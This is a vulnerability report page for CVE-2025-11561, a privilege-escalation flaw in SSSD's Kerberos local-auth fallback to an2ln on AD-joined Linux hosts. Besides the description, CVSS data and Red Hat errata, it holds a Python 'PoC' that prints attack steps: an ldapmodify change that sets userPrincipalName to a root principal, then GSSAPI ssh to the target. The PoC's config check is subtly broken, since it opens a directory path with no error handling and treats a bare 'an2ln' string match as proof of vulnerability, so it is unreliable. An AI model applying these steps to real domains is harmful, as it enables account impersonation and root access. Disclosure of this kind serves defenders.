Security Vulnerability Report
中文
CVE-2025-11561 CVSS 8.8 HIGH

CVE-2025-11561

Published: 2025-10-09 14:15:54
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw was found in the integration of Active Directory and the System Security Services Daemon (SSSD) on Linux systems. In default configurations, the Kerberos local authentication plugin (sssd_krb5_localauth_plugin) is enabled, but a fallback to the an2ln plugin is possible. This fallback allows an attacker with permission to modify certain AD attributes (such as userPrincipalName or samAccountName) to impersonate privileged users, potentially resulting in unauthorized access or privilege escalation on domain-joined Linux hosts.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Red Hat Enterprise Linux 8 (SSSD相关组件)
Red Hat Enterprise Linux 9 (SSSD相关组件)
Red Hat Enterprise Linux 10 (SSSD相关组件)
所有使用默认SSSD配置并启用sssd_krb5_localauth_plugin的Linux发行版

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11561 PoC - SSSD Kerberos Local Auth Plugin Privilege Escalation # This PoC demonstrates the concept of exploiting the sssd_krb5_localauth_plugin # fallback to an2ln plugin for impersonating privileged users. # Prerequisites: # - Valid AD account with write permission to userPrincipalName or samAccountName # - Target Linux host joined to AD domain via SSSD # - Default SSSD configuration with sssd_krb5_localauth_plugin enabled import subprocess import sys def check_sssd_config(): """Check if sssd_krb5_localauth_plugin is enabled and an2ln fallback exists""" config_paths = [ "/etc/sssd/sssd.conf", "/etc/sssd/conf.d/" ] for path in config_paths: try: with open(path, 'r') as f: content = f.read() if "sssd_krb5_localauth_plugin" in content: print(f"[+] Found SSSD config at {path}") if "an2ln" in content: print("[!] an2ln fallback plugin detected - VULNERABLE") return True except FileNotFoundError: continue return False def exploit_concept(): """ Conceptual exploit steps: 1. Modify AD user attributes (userPrincipalName/samAccountName) to a value that triggers an2ln fallback 2. The malicious attribute value should resolve to a privileged local user (e.g., 'root') 3. When the modified user authenticates via Kerberos on Linux, sssd_krb5_localauth_plugin falls back to an2ln 4. an2ln maps the crafted value to the privileged local username 5. Authentication succeeds with elevated privileges """ print("[*] CVE-2025-11561 Exploitation Concept") print("[*] Step 1: Verify target is vulnerable") if not check_sssd_config(): print("[-] Target does not appear vulnerable") sys.exit(1) print("[*] Step 2: Modify AD user attributes via LDAP/ADSI") print(" Example using ldapmodify:") print(' dn: CN=victim,CN=Users,DC=domain,DC=com') print(' changetype: modify') print(' replace: userPrincipalName') print(' userPrincipalName: [email protected]') print("[*] Step 3: Trigger Kerberos authentication on target Linux host") print(" ssh -o GSSAPIAuthentication=yes user@target_host") print("[*] Step 4: Verify privilege escalation") print(" id # Should show root or privileged user") if __name__ == "__main__": exploit_concept() # Mitigation: Apply Red Hat security updates: # RHSA-2025:19610, RHSA-2025:19847, RHSA-2025:19848, RHSA-2025:19849, RHSA-2025:19850 # Or disable sssd_krb5_localauth_plugin in sssd.conf

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11561", "sourceIdentifier": "[email protected]", "published": "2025-10-09T14:15:54.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the integration of Active Directory and the System Security Services Daemon (SSSD) on Linux systems. In default configurations, the Kerberos local authentication plugin (sssd_krb5_localauth_plugin) is enabled, but a fallback to the an2ln plugin is possible. This fallback allows an attacker with permission to modify certain AD attributes (such as userPrincipalName or samAccountName) to impersonate privileged users, potentially resulting in unauthorized access or privilege escalation on domain-joined Linux hosts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:19610", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19847", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19848", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19849", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19850", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19851", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19852", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19853", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19854", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:19859", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:20954", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21020", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21067", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21329", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21795", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22256", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22265", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22277", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22529", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22548", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22724", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23113", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0316", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0677", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-11561", "source": "[email protected]"}, {"url": "https://blog.async.sg/kerberos-ldr", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402727", "source": "[email protected]"}, {"url": "https://github.com/SSSD/sssd/issues/8021", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.